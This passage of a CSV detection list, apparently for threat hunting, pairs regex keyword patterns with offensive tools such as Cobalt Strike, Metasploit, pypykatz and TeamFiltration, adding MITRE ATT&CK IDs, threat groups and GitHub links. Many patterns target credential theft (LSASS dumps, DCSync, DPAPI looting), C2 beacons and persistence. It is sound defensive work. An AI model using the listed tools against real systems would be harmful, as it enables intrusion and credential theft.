*",".{0,1000}\]\sTARGET\sDLL\sIS\sNOT\sVULNERABLE\sTO\s.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","9","6","516","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z" "*] TeamFiltration V3.5.3 PUBLIC*",".{0,1000}\]\sTeamFiltration\sV3\.5\.3\sPUBLIC.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*] to download void.zip using BitsTransfer*",".{0,1000}\]\sto\sdownload\svoid\.zip\susing\sBitsTransfer.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","script content","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*] Token does NOT have SE_ASSIGN_PRIMARY_NAME* using CreateProcessAsWithToken() for launching:*",".{0,1000}\]\sToken\sdoes\sNOT\shave\sSE_ASSIGN_PRIMARY_NAME.{0,1000}\susing\sCreateProcessAsWithToken\(\)\sfor\slaunching\:.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","0","#program content","10","2","154","24","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z" "*] Triage SCCM Secrets*",".{0,1000}\]\sTriage\sSCCM\sSecrets.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*] Triggered Meterpreter oneliner on *",".{0,1000}\]\sTriggered\sMeterpreter\soneliner\son\s.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*] use the aes key from the beacon's online info to encrypt transfer data (base64 format*",".{0,1000}\]\suse\sthe\saes\skey\sfrom\sthe\sbeacon\'s\sonline\sinfo\sto\sencrypt\stransfer\sdata\s\(base64\sformat.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*] use the public key from .beacon_keys to decrypt the beacon's online info*",".{0,1000}\]\suse\sthe\spublic\skey\sfrom\s\.beacon_keys\sto\sdecrypt\sthe\sbeacon\'s\sonline\sinfo.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*] User can impersonate the following logins: *",".{0,1000}\]\sUser\scan\simpersonate\sthe\sfollowing\slogins\:\s.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*] UserInitMprLogonScript Persistence created*",".{0,1000}\]\sUserInitMprLogonScript\sPersistence\screated.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*] Writing obfuscated payload to *",".{0,1000}\]\sWriting\sobfuscated\spayload\sto\s.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*] You would like to generate .EXE using lauch4j? (y/n):*",".{0,1000}\]\sYou\swould\slike\sto\sgenerate\s\.EXE\susing\slauch4j\?\s\(y\/n\)\:.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*]Spawning Process with Spoofed Parent*",".{0,1000}\]Spawning\sProcess\swith\sSpoofed\sParent.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "*_adAclOutput*.csv*",".{0,1000}_adAclOutput.{0,1000}\.csv.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","AD Enumeration","7","10","906","155","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*_adAclOutput*.csv*",".{0,1000}_adAclOutput.{0,1000}\.csv.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","AD Enumeration","7","10","906","155","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*_adAclOutput*.csv*",".{0,1000}_adAclOutput.{0,1000}\.csv.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","AD Enumeration","7","10","906","155","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*_adAclOutput*.csv*",".{0,1000}_adAclOutput.{0,1000}\.csv.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","AD Enumeration","7","10","906","155","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*_adAclOutput*.csv*",".{0,1000}_adAclOutput.{0,1000}\.csv.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","AD Enumeration","7","10","906","155","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*_adAclOutput*.xlsx*",".{0,1000}_adAclOutput.{0,1000}\.xlsx.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","AD Enumeration","7","10","906","155","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*_backdoor.exe*",".{0,1000}_backdoor\.exe.{0,1000}","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","POST Exploitation tools","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","1","75","18","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z" "*_backdoor.rb*",".{0,1000}_backdoor\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*_BloodHound.zip*",".{0,1000}_BloodHound\.zip.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","10","10","9395","1668","2024-02-09T22:50:23Z","2016-04-17T18:36:14Z" "*_cobaltstrike*",".{0,1000}_cobaltstrike.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*_dcsync.txt*",".{0,1000}_dcsync\.txt.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*_dns_hijack/*.js*",".{0,1000}_dns_hijack\/.{0,1000}\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*_dns_hijack/*.rb*",".{0,1000}_dns_hijack\/.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*_dump_users.lst*",".{0,1000}_dump_users\.lst.{0,1000}","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","5","4","342","39","2024-03-28T10:30:53Z","2018-10-22T18:21:44Z" "*_enum_vault_creds*",".{0,1000}_enum_vault_creds.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*_EvilClippy.*",".{0,1000}_EvilClippy\..{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","0","N/A","10","10","2051","385","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z" "*_execve_binsh.s*",".{0,1000}_execve_binsh\.s.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*_find_sharpgen_dll*",".{0,1000}_find_sharpgen_dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*_generate_bind_payloads_password*",".{0,1000}_generate_bind_payloads_password.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*_generate_scramblesuit_passwd*",".{0,1000}_generate_scramblesuit_passwd.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*_GetNetLoggedon.py*",".{0,1000}_GetNetLoggedon\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*_iepv.zip.*",".{0,1000}_iepv\.zip\..{0,1000}","offensive_tool_keyword","IEPassView","IE PassView scans all Internet Explorer passwords in your system and display them on the main window.","T1555 - T1212","TA0006","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/internet_explorer_password.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*_KIWI_BCRYPT_HANDLE_KEY*",".{0,1000}_KIWI_BCRYPT_HANDLE_KEY.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*_KIWI_BCRYPT_KEY*",".{0,1000}_KIWI_BCRYPT_KEY.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*_KIWI_BCRYPT_KEY81*",".{0,1000}_KIWI_BCRYPT_KEY81.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*_KIWI_MASTERKEY_CACHE_ENTRY*",".{0,1000}_KIWI_MASTERKEY_CACHE_ENTRY.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*_lfi_rce.rb*",".{0,1000}_lfi_rce\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*_lsass.txt*",".{0,1000}_lsass\.txt.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*_lsassdecrypt.py*",".{0,1000}_lsassdecrypt\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*_mailinthemiddle.log*",".{0,1000}_mailinthemiddle\.log.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*_mouse_rce.rb*",".{0,1000}_mouse_rce\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*_msfconsole*",".{0,1000}_msfconsole.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*_msfvenom*",".{0,1000}_msfvenom.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*_nimplant_*",".{0,1000}_nimplant_.{0,1000}","offensive_tool_keyword","nimplant","A light-weight 